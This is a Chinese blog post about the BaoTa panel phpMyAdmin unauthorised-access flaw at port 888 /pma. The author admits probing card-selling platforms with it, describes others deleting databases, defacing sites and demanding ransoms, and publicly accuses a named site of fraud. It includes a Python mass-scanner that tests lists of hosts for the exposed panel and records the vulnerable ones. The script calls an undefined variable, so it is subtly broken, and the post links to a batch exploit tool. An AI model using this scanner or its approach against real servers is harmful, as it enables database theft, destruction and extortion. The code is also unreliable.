宝塔phpmyadmin未授权访问漏洞引发的一些有趣的事

HEXBLOG 184 1
广告

前言

宝塔凭借着简单的图形操作还有一些优势,国内使用的人非常多,但就是出了个致命的漏洞引发一些有意思事情。

宝塔phpmyadmin未授权访问漏洞引发的一些有趣的事

漏洞简介

phpmyadmin未鉴权可直接登录phpmyadmin访问数据库。

访问漏洞地址:http://ip:888/pma 即可直接登录phpmyadmin

影响Linux面板7.4.2/Windows面板6.8

Linux7.4.2专业版似乎不影响,可能这就是充钱的力量,也可能是后台直接修复,这就不知道了

宝塔phpmyadmin未授权访问漏洞引发的一些有趣的事
宝塔phpmyadmin未授权访问漏洞引发的一些有趣的事

0day很早就被利用

通过查看web日志发现宝塔这次漏洞很早就有人开始利用了

证明看日志都可以找到0day[aru_43]

宝塔phpmyadmin未授权访问漏洞引发的一些有趣的事

漏洞利用

首先我是找了几个发卡平台,很多都是被别人玩剩的,太菜了我,也不会绕过waf

删库的也有,只删后台账号密码的也有,留言挂黑页,勒索比特币,真是我没想到,什么站都敢搞[aru_39]

宝塔phpmyadmin未授权访问漏洞引发的一些有趣的事
宝塔phpmyadmin未授权访问漏洞引发的一些有趣的事
宝塔phpmyadmin未授权访问漏洞引发的一些有趣的事

暗网都出来了[aru_16]

我这里直接曝光个骗子发卡平台(自己没用上很气)
http://sl.lxl66.cn/
全是假卡密,分站代理很多,骗了不少钱

点击查看完整内容

批量扫描

昨天已经很多大佬写批量了,我自己写了个脚本,新手学习一下就行了,大佬直接无视,下面有大佬写的高级利用程序

温馨提示

工具和相关代码只供学习交流,不能用于违法用途,请在下载后24小时内删除。

# -*- coding:utf-8 -*-
import requests

def exp(url):
    url = "http://" + url
    payload = ':888/pma'
    url = url + payload
    try:
        req = requests.get(url,timeout=3)
        fh = req.status_code
        if fh == 200:
            req_a = req.content
            req_b = str(req_a,'utf-8')
            nr = 'phpMyAdmin'
            if nr in req_b:
                print('漏洞存在'+url)
                with open("result.txt","a") as f:
                    f.write("{}\n".format(url))
            else:
                print('漏洞不存在')
        else:
            print('错误')
    except:
        pass


num=0
with open('url.txt','r',encoding="gb18030") as f:
    for i in f.readlines():
        num+=1
        print(test)
        url=i.strip('\n')
        exp(url)

深信服,通达,BT漏洞批量扫描工具

点击下载

宝塔phpmyadmin未授权访问漏洞引发的一些有趣的事

发表评论 取消回复
表情 图片 链接 代码

  1. 古酒道人

    牛逼

分享